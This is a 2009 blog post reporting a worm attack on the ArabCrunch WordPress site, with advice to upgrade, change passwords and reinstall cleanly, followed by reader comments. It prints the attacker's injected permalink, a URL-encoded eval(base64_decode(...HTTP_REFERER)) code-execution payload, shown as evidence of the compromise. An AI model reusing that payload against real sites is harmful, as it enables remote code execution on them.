(Alert) ArabCrunch and WordPress Under Attack: Upgrade your WordPress site IMMEDIATELY.

6 Sep, 2009

Yesterday, I discovered that the permalinks of ArabCrunch posts are not working and have changed to:

http://arabcrunch.com/2009/09/03/facebook-starts-rolling-out-a-new-tweaked-inbox-fanpages-updates-now-more-visible/%&%28%7B$%7Beval%28base64_decode%28$_

SERVER%5BHTTP_REFERER%5D%29%29%7D%7D|.+%29&%/

I got panicked, and as ArabCrunch is run using the most popular free open source blogging platform: WordPress (WP), I upgraded WP to the latest version and changed the permalinks back to their original form.
But today at a certain point some old posts’ permalink did not work, I was now sure AC is under attack. and by looking at today’s blog post by Matthew Mullenweg wordpress cofounder, the problem I am facing is actually a warm that has been attacking wordpress self hosted blogs that are older than the current 2.8.4 version.

In his post Matt wrote:

It is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

And this is exactly what happened to AC, 7 new users have registered to AC’s WP in the last few days, something that was strange to me, here are their emails:

janson206@Safe-mail.net

pulvillarrac@gmail.com

bugbeemershonyhe@gmail.com

obierebelominepyb@gmail.com
naomyrotenford@gmail.com

This warm is dangerous as Matt explains:

Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.

Matt, Lorelle and ArabCrunch urges all WP users update your WordPress site IMMEDIATELY to the latest version. Change ALL passwords to a strong password immediately, including WordPress blog access for all users, database, FTP, control panels, everything.

And if you had the symptoms I described above Lorelle suggests the following:

If your site has already been attacked, it appears that the hack attacks the database, going deep. We’re looking for solutions, but the easiest appears to be to export all your content with the built-in XML WordPress export (pre 2.1 versions, try the WordPress-to-WordPress Import WordPress Plugin) and literally remove your WordPress installation totally (save images and general files). DO NOT EXPORT YOUR DATABASE! Install the latest version of WordPress and add the “clean” backup of your WordPress Theme, then import the XML export. The export will contain your posts, Pages, and comments, and hopefully no other hacked code.

Since I do not know how well the attacker has infiltrated AC, I will tomorrow by the well of God, delete WP installation and clean up the database, after doing another export and reinstall WP.

This warm is against the spirit of the open source community ( shame on the perpetrator/s) and comes at a time when I was planning to launch the Arabic version of ArabCrunch in 2 days. But now I have to fix this ASAP. And since AC’s theme is old, I will finish customizing a theme I started working with a while ago. So be patient in the coming few days.

If you found any problems while browsing ArabCrunch please report them to my email: editor _attt_ ?arabcrunch _dottt_ com
If you are running WP make sure to read these posts:

keep wordpress secure.

WordPress Vesrions under Attack

How to clean up your hacked WP installation.

WP Permalink RSS problems.

(PS: Thanks to everyone who helped in this.)

Image by Civitanova Marche.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

  1. @mmahgoub  |  September 6th, 2009 at 1:59 AM #

    Allah satar this time next time when you saw an available update notice please take it seriously!

  2. (Alert) ArabCrunch and WordPress Under Attack: Upgrade your … | Under ar mour live today.  |  September 6th, 2009 at 6:50 AM #

    [...] that the permalinks of ArabCrunch posts are not employed and hit changed. See the example post: (Alert) ArabCrunch and WordPress Under Attack: Upgrade your … Posted in Uncategorized | Tags: and-have, not-working, permalinks, posts-are, [...]

  3. How to Make Money Online »  Back to Twitter  |  September 6th, 2009 at 1:41 PM #

    [...] admin panel for a while now, but after after reading the warning and the incident that happened on Arabcrunch I decided to upgrade immediately, and you should too, I guess an exploit similar to this was behind [...]

  4. ArabCrunch.com Reports Wordpress Worm Attack « Social MENA  |  September 6th, 2009 at 10:28 PM #

    [...] literaly every professional blogger started urging others to upgrade and it’s actually worth reading about it to get some useful information on how to avoid it and clean-up after [...]

  5. estetik  |  September 7th, 2009 at 10:32 PM #

    thanks, i can quote this article ?

  6. Older versions of WordPress under attack posted @ drew3ooo  |  September 22nd, 2009 at 2:42 PM #

    [...] 2.8.4. which can allow nasty things like permalinks being changed to direct people elsewhere, as ArabCrunch points [...]

  7. abrcity  |  September 23rd, 2009 at 6:39 PM #

    very nice article,very helpful

  8. Mr. Twitter  |  September 24th, 2009 at 9:08 PM #

    O.K. I agree with you!THANKS! You guys do a great blog, and have some great contents. Keep up the good work.

  9. escorts latin  |  July 24th, 2010 at 2:43 AM #

    I would like to read a bit more on this blog soon. By the way, rather good design this blog has, but what do you think about changing it every few months?

    Abigail Funweather

  10. AnnaGunish  |  October 29th, 2011 at 12:28 PM #

    Nice blog! I will be back for new info! Keep it up! And consider adding bigger number of pictures!

    Anna Gunish
    London young escort

Leave a Feedback

  • Become Our Fan On Facebook

    ArabCrunch on Facebook

  • Popular Posts



  • Recent Comments
    • Gaith Saqer: Thank you Ahmed for your analysis I am n...
    • Ahmed: @Gaith Intel acquired SysDSoft early ...
    • ali: Mr Mohammad Abdl Fatah: you are accusati...
    • ali: Iman Gaith is right and you are arguing ...
    • Mohamed Abdallah: Egypt is facing tough time no question b...